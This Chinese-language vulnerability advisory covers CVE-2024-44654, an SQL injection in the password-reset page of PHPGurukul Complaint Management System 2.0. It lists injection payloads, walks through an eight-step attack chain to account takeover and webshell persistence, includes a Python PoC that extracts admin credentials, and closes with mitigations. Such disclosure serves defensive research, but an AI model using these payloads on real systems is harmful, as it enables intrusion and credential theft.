CVE-2024-44654: PHPGurukul投诉管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2024-44654

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Complaint Management System 2.0

漏洞概述

CVE-2024-44654是PHPGurukul Complaint Management System 2.0中的一个中等严重性安全漏洞，CVSS评分6.5。该漏洞存在于reset-password.php页面，由于对用户输入的email和mobileno参数缺乏充分的输入验证和过滤，攻击者可以通过构造恶意的SQL语句片段实现SQL注入攻击。

PHPGurukul Complaint Management System是一款基于PHP和MySQL开发的在线投诉管理系统，广泛应用于各类企业和组织的客户服务部门。该系统提供了用户注册、登录、提交投诉、查看投诉状态等功能模块。其中密码重置功能允许用户通过邮箱或手机号码验证身份后重置密码。

然而，由于开发人员在实现密码重置功能时对用户输入参数处理不当，攻击者可以在email或mobileno字段中注入SQL代码，从而在数据库查询中执行任意SQL语句。这可能导致以下风险：未经授权访问用户账户、窃取敏感用户数据（包括用户名、密码哈希、邮箱地址等）、修改或删除数据库中的投诉记录、在某些情况下甚至可能通过MySQL的LOAD_FILE、INTO OUTFILE等函数实现系统文件读取或写入，进一步可能导致服务器被完全控制。

该漏洞的CVSS向量显示攻击复杂度低，无需认证和用户交互即可利用，攻击者可以通过网络直接发起攻击。虽然机密性和完整性影响仅为低级别，但大量用户数据面临泄露风险，仍需及时修复。

技术细节

漏洞位于PHPGurukul Complaint Management System 2.0的reset-password.php文件中的密码重置功能模块。系统在处理用户请求时，直接将用户输入的email和mobileno参数拼接到SQL查询语句中，而未进行充分的输入验证或使用参数化查询。

攻击者可以通过在email或mobileno参数中注入SQL代码片段，如使用单引号(')闭合原始字符串，然后添加UNION SELECT、布尔盲注、时间盲注等SQL注入技术来提取数据库中的敏感信息。

常见的注入payload包括：
1. 使用单引号测试注入点：email=' OR '1'='1
2. 使用UNION注入提取数据：email=' UNION SELECT user(),database(),3-- -
3. 使用布尔盲注：email=' OR (SELECT COUNT(*) FROM users)>0--
4. 使用时间盲注：email=' OR SLEEP(5)--

由于该系统使用MySQL数据库，攻击者可能通过注入获取users表中的用户名和密码哈希。如果管理员密码强度不足，攻击者可快速破解并获得后台管理权限，进一步扩大攻击面。

此外，通过SQL注入，攻击者还可以：
- 枚举数据库结构和表名
- 读取任意数据库记录
- 写入恶意文件到Web目录（如果MySQL权限允许）
- 在某些配置下执行系统命令

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的是PHPGurukul Complaint Management System，并定位到reset-password.php密码重置页面

STEP 2

步骤2: 漏洞探测

攻击者在email或mobileno参数中注入单引号(')或其他SQL特殊字符，观察系统响应以确认是否存在SQL注入漏洞

STEP 3

步骤3: 注入类型识别

通过发送不同的payload（如UNION、布尔盲注、时间盲注payload）确定后端数据库类型和注入点特征

STEP 4

步骤4: 数据库枚举

利用SQL注入漏洞枚举数据库结构，获取数据库名、表名、字段名等元数据信息

STEP 5

步骤5: 敏感数据提取

通过UNION注入或盲注技术从users表中提取用户名和密码哈希值

STEP 6

步骤6: 密码破解

如果获取的密码哈希可破解，攻击者使用字典攻击或暴力破解获取明文密码

STEP 7

步骤7: 账户接管

使用获取的凭证登录系统，可能获得管理员权限，实现完全账户接管

STEP 8

步骤8: 持久化控制

在获得管理权限后，可能通过后台功能上传webshell或修改数据库实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-44654 SQL Injection PoC
# Target: PHPGurukul Complaint Management System 2.0
# Vulnerable Parameter: email, mobileno in reset-password.php

TARGET_URL = "http://target.com/complaint/reset-password.php"

def test_sqli_basic():
    """Test basic SQL injection with single quote"""
    payload = "'"
    data = {
        "email": payload,
        "mobileno": "1234567890",
        "submit": "Submit"
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, timeout=10)
        # Check for SQL error messages in response
        if "SQL" in response.text or "mysql" in response.text.lower() or "syntax" in response.text.lower():
            print("[+] SQL Injection vulnerability confirmed!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

def extract_admin_credentials():
    """Extract admin credentials using UNION-based injection"""
    # This payload attempts to extract data from users table
    payload = "' UNION SELECT 1,2,3,4,5,6,user_name,user_password,email,9,10,11 FROM users LIMIT 1-- -"
    data = {
        "email": payload,
        "mobileno": "1234567890",
        "submit": "Submit"
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, timeout=10)
        print("[*] Extracting data...")
        # Parse response to extract credentials
        # In real attack, parse response.text for extracted data
        print(response.text[:500])
    except Exception as e:
        print(f"[-] Error: {e}")

def blind_sqli_test():
    """Test blind SQL injection using time-based technique"""
    # Time-based blind injection payload
    payload = "' OR SLEEP(5)-- -"
    data = {
        "email": payload,
        "mobileno": "1234567890",
        "submit": "Submit"
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, timeout=15)
        print("[*] Response received")
    except requests.exceptions.Timeout:
        print("[+] Time-based blind SQL injection confirmed!")

if __name__ == "__main__":
    print("CVE-2024-44654 SQL Injection PoC")
    print("=" * 50)
    
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    
    print(f"[*] Target: {TARGET_URL}")
    
    if test_sqli_basic():
        print("[*] Proceeding with data extraction...")
        extract_admin_credentials()
        blind_sqli_test()

影响范围

PHPGurukul Complaint Management System 2.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 在Web服务器层面配置ModSecurity等WAF规则，过滤包含SQL特殊字符的请求；2) 临时禁用密码重置功能或限制该功能的访问频率；3) 加强对数据库账户的权限控制，移除不必要的文件读写权限；4) 实施IP白名单或验证码机制，防止自动化SQL注入工具的大规模扫描和利用；5) 密切监控Web服务器和数据库日志，及时发现和响应异常访问行为；6) 考虑部署入侵检测系统（IDS）监控针对该漏洞的攻击尝试。